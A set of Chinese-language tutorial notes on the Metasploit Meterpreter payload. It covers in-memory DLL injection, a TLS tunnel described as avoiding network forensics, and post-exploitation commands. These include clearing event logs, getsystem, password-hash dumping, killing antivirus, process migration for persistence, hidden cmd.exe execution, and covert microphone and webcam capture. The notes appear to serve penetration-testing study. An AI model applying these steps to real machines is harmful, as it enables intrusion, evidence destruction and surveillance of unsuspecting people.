基于内存的DLL注入式payload
注入合法的系统进程并建立stager
基于stager上传和预加载DLL进行扩展模块的注入(客户端API)
基于stager建立的socket连接建立加密的TLS/1.0通信隧道(避免网络取证)
利用TLS隧道进一步加载后续扩展模块
meterpreter服务器使用C语言编写,客户端基于ruby的全特性API(支持任何语言)
进入到meterpreter的shell
help命令查看命令帮助手册
background后退到msf的命令提示符界面
pwd当前目录,cd,ls,mkdir,rmdir删除目录,mv,cat,rm,edit相当于vi,
lcd,lpwd 本地linux的目录操作
run运行模块
bgrun后台运行模块,有两百多个模块可以使用
比如杀掉杀毒程序的模块
获取用户密码hash
远程桌面
clearev 清除事件日志
清理前可以看到这么多日志
运行clearev之后
时间日志就被清除了
download 下载文件
将目标主机上的文件下载到本地
upload 上传文件
将本机文件上传到目标机器上
上传一个nc.exe到目标主机
执行execute
execute -f cmd.exe -i -H
后台执行cmd.exe
getuid查看当前账号
getsystem获取system权限
getprivs,查看权限
getproxy,获取代理
getpid 查看payload注入的是哪个进程
ps查看目标主机上运行的进程,可以看到对应的进程是svchost.exe
我们可以将注入迁移到其他的进程 migrate
比如迁移到explorer.exe上,注入更持久
就迁移到1512进程上了
sysinfo查看目标主机信息
kill 杀死进程
reboot重启目标机器
shell获取shell
show_mount 查看硬盘信息
搜索文件
arp 查看arp缓存
netstat查看网络连接情况
ifconfig、ipconfig 查看当前IP
route 查看路由表
route -add 添加路由表 -delete删除路由表
idletime 查看目标机器空闲时间
resource 添加脚本执行文件,一键执行多条指令
比如先建立一个脚本文件
里面打个比方放上两条指令
然后调用这个脚本文件 resource -r r.txt,就逐步执行刚才的两条指令
record_mic 记录麦克风
webcam_list 列出目标机器上连接的摄像头
webcam_snap -i 1 -v false 每隔一秒拍摄一张图片
meterpreter python 扩展
客户端无需运行环境,就可以运行原生python代码,无需编译
这个扩展是以插件的形式,需要加载到meterprete
help查看就会看到多出来几个python的命令
python execute 直接执行命令
python_import 加载python文件
比如有一个find.py
执行
然后就可以自己写python工具!